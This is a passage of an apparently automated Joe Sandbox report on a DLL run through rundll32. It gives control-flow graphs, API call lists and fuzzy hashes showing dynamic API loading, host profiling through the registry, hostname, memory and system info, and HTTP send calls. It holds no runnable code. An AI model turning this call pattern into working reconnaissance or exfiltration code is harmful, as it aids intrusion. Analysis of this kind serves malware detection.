83 7ffe11502658-7ffe1150265d call 7ffe11506980 80->83 81->80 85 7ffe115025f9-7ffe11502632 call 7ffe115069b0 81->85 82->76 83->76 85->78 89->64 90->89
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Internet$AddressProc$Option$CloseHandleHttpRequest$ErrorHeapLastOpenSend$AllocConnectFileLibraryLoadProcessQueryReadwcscatwcscpy
    • String ID: /$`
    • API String ID: 1971805275-1897241921
    • Opcode ID: 012db6c3d47eaee4c38ac54376f83c31a08236e5e1d12890b1faab2f80012a7a
    • Instruction ID: f50deccc7e2f9ca7a8a4f32e89b7174216c3f884e5f570255c1f2ccd68af08da
    • Opcode Fuzzy Hash: 012db6c3d47eaee4c38ac54376f83c31a08236e5e1d12890b1faab2f80012a7a
    • Instruction Fuzzy Hash: 0412C836908E81C5E760DB56F8543AAB3A8FB847A4F104079DA8D83A79DF7DD488CB41

    Control-flow Graph

    control_flow_graph 160 7ffe115074e0-7ffe115075a2 161 7ffe115075a4-7ffe115075cc call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 160->161 162 7ffe115075d1-7ffe115075d9 160->162 161->162 164 7ffe115075db-7ffe1150760a call 7ffe11507c50 GetProcAddress call 7ffe11507e50 162->164 165 7ffe1150760f-7ffe11507617 162->165 164->165 168 7ffe11507619-7ffe11507641 call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 165->168 169 7ffe11507646-7ffe1150764e 165->169 168->169 173 7ffe11507684-7ffe1150768c 169->173 174 7ffe11507650-7ffe1150767f call 7ffe11507c50 GetProcAddress call 7ffe11507e50 169->174 175 7ffe115076bb-7ffe115076c3 173->175 176 7ffe1150768e-7ffe115076b6 call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 173->176 174->173 182 7ffe115076f9-7ffe11507701 175->182 183 7ffe115076c5-7ffe115076f4 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 175->183 176->175 188 7ffe11507737-7ffe1150773f 182->188 189 7ffe11507703-7ffe11507732 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 182->189 183->182 190 7ffe11507775-7ffe1150777d 188->190 191 7ffe11507741-7ffe11507770 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 188->191 189->188 196 7ffe115077bc-7ffe115077c4 190->196 197 7ffe1150777f-7ffe115077b7 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 190->197 191->190 203 7ffe115077c6-7ffe115077fe call 7ffe11507c50 GetProcAddress call 7ffe11507e50 196->203 204 7ffe11507803-7ffe1150780b 196->204 197->196 203->204 205 7ffe1150780d-7ffe11507845 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 204->205 206 7ffe1150784a-7ffe11507852 204->206 205->206 211 7ffe11507854-7ffe1150788c call 7ffe11507c50 GetProcAddress call 7ffe11507e50 206->211 212 7ffe11507891-7ffe11507899 206->212 211->212 217 7ffe1150789b-7ffe115078cc call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 212->217 218 7ffe115078d1-7ffe115078d9 212->218 217->218 220 7ffe115078db-7ffe11507913 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 218->220 221 7ffe11507918-7ffe11507920 218->221 220->221 226 7ffe11507928-7ffe11507970 221->226 227 7ffe11507922 SetProcessDPIAware 221->227 234 7ffe11507b69-7ffe11507b88 call 7ffe11509540 226->234 235 7ffe11507976-7ffe11507988 226->235 227->226 239 7ffe11507b5b 235->239 240 7ffe1150798e-7ffe115079a4 call 7ffe11506950 235->240 239->234 240->239 243 7ffe115079aa-7ffe115079bf 240->243 245 7ffe115079c5-7ffe115079dd call 7ffe11507b90 243->245 246 7ffe11507b51-7ffe11507b56 call 7ffe11506980 243->246 245->246 250 7ffe115079e3-7ffe115079f9 call 7ffe115070a0 245->250 246->239 250->246 253 7ffe115079ff-7ffe11507a19 250->253 255 7ffe11507b43-7ffe11507b4b DeleteObject 253->255 256 7ffe11507a1f-7ffe11507a33 253->256 255->246 258 7ffe11507a39-7ffe11507a59 256->258 259 7ffe11507b35 256->259 261 7ffe11507b25-7ffe11507b2d 258->261 262 7ffe11507a5f-7ffe11507ac5 call 7ffe11506950 258->262 259->255 261->259 262->261 267 7ffe11507ac7-7ffe11507aee 262->267 269 7ffe11507b1b-7ffe11507b20 call 7ffe11506980 267->269 270 7ffe11507af0-7ffe11507af9 267->270 269->261 271 7ffe11507b0c-7ffe11507b19 270->271 272 7ffe11507afb-7ffe11507b0a 270->272 271->261 272->271
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$AwareDeleteObjectProcess
    • String ID:
    • API String ID: 96057529-0
    • Opcode ID: 8cfb5bf55d4cd5814cb5932fe69723dd0fdf4b2c5a54e68c6a7713185a63c261
    • Instruction ID: ecffef4a928d7926ff187ac697811ae0017b54c37f1db329e966a3c5866b6ede
    • Opcode Fuzzy Hash: 8cfb5bf55d4cd5814cb5932fe69723dd0fdf4b2c5a54e68c6a7713185a63c261
    • Instruction Fuzzy Hash: BD02DC3291DE86C5EB60EB66E8543AA73A8FB84764F4000B9DA8D43775DF7CE484CB41

    Control-flow Graph

    control_flow_graph 331 7ffe115069f0-7ffe11506a55 332 7ffe11506a57-7ffe11506a7f call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 331->332 333 7ffe11506a84-7ffe11506a8c 331->333 332->333 335 7ffe11506ac2-7ffe11506aca 333->335 336 7ffe11506a8e-7ffe11506abd call 7ffe11507c50 GetProcAddress call 7ffe11507e50 333->336 339 7ffe11506acc-7ffe11506af4 call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 335->339 340 7ffe11506af9-7ffe11506b01 335->340 336->335 339->340 344 7ffe11506b37-7ffe11506b3f 340->344 345 7ffe11506b03-7ffe11506b32 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 340->345 347 7ffe11506b75-7ffe11506b7d 344->347 348 7ffe11506b41-7ffe11506b70 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 344->348 345->344 353 7ffe11506bac-7ffe11506bb4 347->353 354 7ffe11506b7f-7ffe11506ba7 call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 347->354 348->347 359 7ffe11506bea-7ffe11506c55 call 7ffe1150a8b0 RtlGetVersion 353->359 360 7ffe11506bb6-7ffe11506be5 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 353->360 354->353 369 7ffe11506c6c-7ffe11506c77 GetSystemInfo 359->369 370 7ffe11506c57-7ffe11506c6a GetNativeSystemInfo 359->370 360->359 371 7ffe11506c7f-7ffe11506c8f 369->371 370->371 372 7ffe11506ca8-7ffe11506cb0 371->372 373 7ffe11506c91-7ffe11506c96 371->373 376 7ffe11506cbc-7ffe11506cc4 372->376 377 7ffe11506cb2-7ffe11506cba 372->377 374 7ffe11506c98-7ffe11506c9d 373->374 375 7ffe11506d17-7ffe11506d1f 373->375 380 7ffe11506dc3-7ffe11506dcb 374->380 381 7ffe11506ca3-7ffe11506e05 374->381 378 7ffe11506d42-7ffe11506d4a 375->378 379 7ffe11506d21-7ffe11506d2c 375->379 383 7ffe11506cc6-7ffe11506cce 376->383 384 7ffe11506cd0-7ffe11506cd8 376->384 382 7ffe11506d12 377->382 392 7ffe11506d6d-7ffe11506d75 378->392 393 7ffe11506d4c-7ffe11506d57 378->393 387 7ffe11506d38 379->387 388 7ffe11506d2e-7ffe11506d36 379->388 389 7ffe11506dcd-7ffe11506dd8 380->389 390 7ffe11506e03 380->390 386 7ffe11506e0d-7ffe11506e15 381->386 382->386 383->382 384->382 385 7ffe11506cda-7ffe11506ce5 384->385 394 7ffe11506ce7-7ffe11506cef 385->394 395 7ffe11506cf1-7ffe11506cfe GetSystemMetrics 385->395 398 7ffe11506e17-7ffe11506e1d 386->398 399 7ffe11506e21-7ffe11506e47 call 7ffe11509540 386->399 400 7ffe11506d40 387->400 388->400 401 7ffe11506dfb 389->401 402 7ffe11506dda-7ffe11506de5 389->402 390->386 396 7ffe11506d98-7ffe11506da0 392->396 397 7ffe11506d77-7ffe11506d82 392->397 403 7ffe11506d59-7ffe11506d61 393->403 404 7ffe11506d63 393->404 394->382 407 7ffe11506d0a 395->407 408 7ffe11506d00-7ffe11506d08 395->408 409 7ffe11506da2-7ffe11506dad 396->409 410 7ffe11506dc1 396->410 405 7ffe11506d84-7ffe11506d8c 397->405 406 7ffe11506d8e 397->406 398->399 400->410 401->390 412 7ffe11506de7-7ffe11506def 402->412 413 7ffe11506df1 402->413 414 7ffe11506d6b 403->414 404->414 415 7ffe11506d96 405->415 406->415 407->382 408->382 416 7ffe11506db9 409->416 417 7ffe11506daf-7ffe11506db7 409->417 410->386 419 7ffe11506df9 412->419 413->419 414->410 415->410 416->410 417->410 419->390
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$InfoSystem$NativeVersion
    • String ID:
    • API String ID: 2883576749-0
    • Opcode ID: 0aea97e101c3ff36eaef724201dc58088ff3a9420ab3d2d647de2ff23f6ba47e
    • Instruction ID: 749c7807441b41434cb1e3f0ed16d88ab75d2f8ef9b9d754f3a694a420171061
    • Opcode Fuzzy Hash: 0aea97e101c3ff36eaef724201dc58088ff3a9420ab3d2d647de2ff23f6ba47e
    • Instruction Fuzzy Hash: 95C1FE3290CE86CAE7709B92E45437E77A8FB85724F6001B9E68D466B4CF7CE584CB11

    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$Name$Computer$ByteCharCloseCountHandleInformationMultiMutexOpenSleepTickUserVersionVolumeWide
    • String ID:
    • API String ID: 410980975-0
    • Opcode ID: e9394c26cd00b21dbd57a55b00268abf68e6b74b96935cfacdfebeadd37971f1
    • Instruction ID: e092227030becf1131ea161675d648340c2a2d9b15261d6fa02384365844dfba
    • Opcode Fuzzy Hash: e9394c26cd00b21dbd57a55b00268abf68e6b74b96935cfacdfebeadd37971f1
    • Instruction Fuzzy Hash: C8C1D232618EC186E770DB66E4943AEB3A5FB84754F40417AE68D87AB9DF3CD448CB40

    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressFindProc$File$CloseFirstLibraryLoadNextswprintf
    • String ID:
    • API String ID: 432991409-0
    • Opcode ID: 71db46e1dc4537d7a33d97d80a5c1f21eb868e22e8d370c5f460187df6bb74ed
    • Instruction ID: db4a84fa6982143c7c33dfe34c3a17843d863ef48f034b46a87b3d783bc23db7
    • Opcode Fuzzy Hash: 71db46e1dc4537d7a33d97d80a5c1f21eb868e22e8d370c5f460187df6bb74ed
    • Instruction Fuzzy Hash: 4561FE3691DE82C5EB50DB62F89436E73A9FB84764F000179EA8D86AB5DF3CE444CB41

    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: InfoSystem$AddressHandleModuleNativeProc
    • String ID:
    • API String ID: 3433367815-0
    • Opcode ID: e677bc09c55e719f3190c1f42bac40b38a2ab6fa020279fe3f27c748c2806ca4
    • Instruction ID: f06dbabcead49a6ffaa2a1a3f39f9ba9bd6acfd41af3442893245330c3ef6a14
    • Opcode Fuzzy Hash: e677bc09c55e719f3190c1f42bac40b38a2ab6fa020279fe3f27c748c2806ca4
    • Instruction Fuzzy Hash: A1119336519E4186E760DB11E49436EB7B8FB88764F501179F6CE82AB8DF3CD988CB40
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: HeapLanguagesPreferredProcessRestoreThread
    • String ID:
    • API String ID: 1665715086-0
    • Opcode ID: 59fcb09733b26d148cb803ad4bcfdd23a7556180398aad1d468162f2fb759d25
    • Instruction ID: a428d5cf2f262633adb7a35786f650712776813ac4f8f25e199d73b0a9d0bf79
    • Opcode Fuzzy Hash: 59fcb09733b26d148cb803ad4bcfdd23a7556180398aad1d468162f2fb759d25
    • Instruction Fuzzy Hash: 6FC01260D15E4181D704BB67A84C055A7B6BFCC750F504078D98901234DD3C80958A00

    Control-flow Graph

    control_flow_graph 96 7ffe11503a70-7ffe11503b01 call 7ffe1150d1c0 call 7ffe1150ceb4 WSAStartup 101 7ffe11503bad-7ffe11503bee call 7ffe11507d50 RegOpenKeyExW 96->101 102 7ffe11503b07-7ffe11503b1d gethostname 96->102 108 7ffe11503d1d-7ffe11503d45 call 7ffe11507e50 GlobalMemoryStatusEx 101->108 109 7ffe11503bf4-7ffe11503c0d call 7ffe11507d50 101->109 104 7ffe11503ba7 WSACleanup 102->104 105 7ffe11503b23-7ffe11503b3c gethostbyname 102->105 104->101 105->104 107 7ffe11503b3e-7ffe11503b65 105->107 107->104 113 7ffe11503b67-7ffe11503ba3 call 7ffe1150a460 inet_ntoa call 7ffe1150d1c0 107->113 118 7ffe11503d5d-7ffe11503d75 call 7ffe11506890 108->118 119 7ffe11503d47-7ffe11503d59 108->119 120 7ffe11503c19-7ffe11503c66 RegEnumKeyExW 109->120 113->104 131 7ffe11503d7b-7ffe11503d90 call 7ffe11506950 118->131 132 7ffe11503f3f-7ffe11503f5e call 7ffe11509540 118->132 119->118 123 7ffe11503c6c-7ffe11503c9a RegOpenKeyExW 120->123 124 7ffe11503d05-7ffe11503d17 call 7ffe11507e50 RegCloseKey 120->124 128 7ffe11503c9c-7ffe11503cd6 RegQueryValueExW 123->128 129 7ffe11503d00 123->129 124->108 134 7ffe11503cd8-7ffe11503cf0 128->134 135 7ffe11503cf2-7ffe11503cfa RegCloseKey 128->135 129->124 133 7ffe11503c0f-7ffe11503c15 129->133 140 7ffe11503d96-7ffe11503ed5 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d290 call 7ffe115011e0 call 7ffe11501d20 131->140 141 7ffe11503f35-7ffe11503f3a call 7ffe11506980 131->141 133->120 134->124 135->129 153 7ffe11503f1a-7ffe11503f33 140->153 154 7ffe11503ed7-7ffe11503f15 call 7ffe1150d290 call 7ffe11506f60 call 7ffe11506e50 140->154 141->132 153->141 154->153
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: CloseOpen$CleanupEnumGlobalMemoryQueryStartupStatusValuegethostbynamegethostnameinet_ntoawcscpy
    • String ID: ,$@
    • API String ID: 923405552-1227015840
    • Opcode ID: 65caa8c5a241ffd7d47acb45c6f88a9704745af025500333e1ec2035ba852a81
    • Instruction ID: d012f5035a357dbfae33fa2ba75c19fb6a55825fc95bf77ab042316a3663ac6c
    • Opcode Fuzzy Hash: 65caa8c5a241ffd7d47acb45c6f88a9704745af025500333e1ec2035ba852a81
    • Instruction Fuzzy Hash: 41D1077261CA8186E760DB56E4903AEB7A5FBC4794F104029EA8D83BB9DF7DD444CF40

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Open$CleanupCloseEnumGlobalMemoryQueryStatusValueinet_ntoa
    • String ID: ,$@
    • API String ID: 1891009110-1227015840
    • Opcode ID: 63b97c74359e0a057b7be61e168736e51b464f00bf6f615fd0d09763af04dbdc
    • Instruction ID: ba9be3b34e3b5683afda6cd982f910ac3e4f7520af80a386146bb3762019f87b
    • Opcode Fuzzy Hash: 63b97c74359e0a057b7be61e168736e51b464f00bf6f615fd0d09763af04dbdc
    • Instruction Fuzzy Hash: 0BB1F776608A818AD760DB5AE4903AEB7B5F7C9794F104029EB8D83BA9DF7DD404CF40

    Control-flow Graph

    control_flow_graph 420 7ffe11509800-7ffe11509806 421 7ffe11509841-7ffe11509998 420->421 422 7ffe11509808-7ffe1150980b 420->422 429 7ffe1150999e-7ffe115099b9 call 7ffe11509bb0 421->429 430 7ffe1150999a-7ffe1150999c 421->430 424 7ffe11509835-7ffe1150986d call 7ffe11509d20 422->424 425 7ffe1150980d-7ffe11509810 422->425 438 7ffe11509872-7ffe11509874 424->438 427 7ffe11509812-7ffe11509815 425->427 428 7ffe11509828 __scrt_dllmain_crt_thread_attach 425->428 434 7ffe11509821-7ffe11509826 call 7ffe11509c60 427->434 435 7ffe11509817-7ffe11509820 427->435 436 7ffe1150982d-7ffe11509834 428->436 440 7ffe115099c5-7ffe115099ec call 7ffe11509cdc call 7ffe11509d0c call 7ffe11509ed4 call 7ffe11509ef8 429->440 441 7ffe115099bb-7ffe115099c0 call 7ffe1150a088 429->441 431 7ffe115099ee-7ffe115099fd 430->431 434->436 442 7ffe11509876-7ffe11509878 438->442 443 7ffe1150987d-7ffe11509892 call 7ffe11509bb0 438->443 440->431 441->440 447 7ffe11509965-7ffe1150997a 442->447 452 7ffe1150989e-7ffe115098af call 7ffe11509c20 443->452 453 7ffe11509894-7ffe11509899 call 7ffe1150a088 443->453 460 7ffe115098b1-7ffe115098ed call 7ffe1150a1d0 call 7ffe11509f74 call 7ffe1150a038 call 7ffe11509f74 call 7ffe1150a05c call 7ffe1150d3b0 452->460 461 7ffe11509918-7ffe11509922 call 7ffe11509ed4 452->461 453->452 460->461 488 7ffe115098ef-7ffe115098f6 __scrt_dllmain_after_initialize_c 460->488 461->442 469 7ffe11509928-7ffe11509934 call 7ffe1150a078 461->469 475 7ffe11509936-7ffe11509940 call 7ffe11509e38 469->475 476 7ffe1150995a-7ffe11509960 469->476 475->476 482 7ffe11509942-7ffe11509955 call 7ffe1150a268 475->482 476->447 482->476 488->461 489 7ffe115098f8-7ffe11509915 call 7ffe1150d338 488->489 489->461
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_release_startup_lock
    • String ID:
    • API String ID: 3876781719-0
    • Opcode ID: c6ae1502c2579020218e65238a4c269c22d830b64cbdee382b0e0d31bb45c9a4
    • Instruction ID: 1d34f49678ba88af66f3cdec63370f005039d64117f364af33fcc5720b4149d4
    • Opcode Fuzzy Hash: c6ae1502c2579020218e65238a4c269c22d830b64cbdee382b0e0d31bb45c9a4
    • Instruction Fuzzy Hash: 68517E21E0CE4385FB10ABE7A4522BD53A8AF553A0F9444BDE94D463FBEE2CE945C341

    Control-flow Graph

    control_flow_graph 492 7ffe11504890-7ffe1150493a call 7ffe11507d50 RegOpenKeyExW 495 7ffe11504d50-7ffe11504d79 call 7ffe11507e50 call 7ffe11509540 492->495 496 7ffe11504940-7ffe11504955 call 7ffe11506950 492->496 501 7ffe1150495b-7ffe11504a2b call 7ffe1150d1c0 call 7ffe11507d50 * 3 call 7ffe11507c50 * 2 RegEnumKeyExW 496->501 502 7ffe11504d42-7ffe11504d4a RegCloseKey 496->502 518 7ffe11504cf1-7ffe11504d3d call 7ffe1150d290 call 7ffe11507e50 * 5 501->518 519 7ffe11504a31-7ffe11504a5c RegOpenKeyExW 501->519 502->495 518->502 521 7ffe11504cec 519->521 522 7ffe11504a62-7ffe11504a9c RegQueryValueExW 519->522 524 7ffe11504aa2-7ffe11504ad2 call 7ffe11506890 522->524 525 7ffe11504ce1-7ffe11504ce6 RegCloseKey 522->525 531 7ffe11504ad4-7ffe11504ade 524->531 532 7ffe11504b31-7ffe11504b6b RegQueryValueExW 524->532 525->521 536 7ffe11504af6-7ffe11504b2c call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 531->536 537 7ffe11504ae0-7ffe11504ae5 531->537 533 7ffe11504b6d-7ffe11504b9d call 7ffe11506890 532->533 534 7ffe11504beb-7ffe11504bff call 7ffe1150d120 532->534 548 7ffe11504be9 533->548 549 7ffe11504b9f-7ffe11504be4 call 7ffe1150d120 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 533->549 551 7ffe11504c09-7ffe11504c43 RegQueryValueExW 534->551 552 7ffe11504c04 call 7ffe1150d120 534->552 536->532 537->536 540 7ffe11504ae7-7ffe11504af1 call 7ffe1150d120 537->540 540->536 548->551 549->548 554 7ffe11504c45-7ffe11504c75 call 7ffe11506890 551->554 555 7ffe11504cc3-7ffe11504cd7 call 7ffe1150d120 551->555 552->551 569 7ffe11504c77-7ffe11504cbc call 7ffe1150d120 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 554->569 570 7ffe11504cc1 554->570 555->525 572 7ffe11504cdc call 7ffe1150d120 555->572 569->570 570->525 572->525
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: QueryValue$ByteCharCloseHeapMultiOpenWide$AllocateEnumProcess
    • String ID:
    • API String ID: 115269039-0
    • Opcode ID: ec38c8757f2f3573cc8d4f1ab0689ad033bc330676511e593263a61f6042648a
    • Instruction ID: 036e0120f42b5caac4813346abc98ef193c9b2ac5027bdf6822700b69918eb2f
    • Opcode Fuzzy Hash: ec38c8757f2f3573cc8d4f1ab0689ad033bc330676511e593263a61f6042648a
    • Instruction Fuzzy Hash: 3DD1C53260CE8181E720DB66E4903AFA7A9FBC57A4F500179EA8D47AB9DF7DD444CB40

    Control-flow Graph

    APIs
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE115092B5
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE115092F3
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150932A
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE11509368
    • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150937F
    • CommandLineToArgvW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150938D
    • LocalFree.KERNEL32 ref: 00007FFE115093F2
    Memory Dump Source
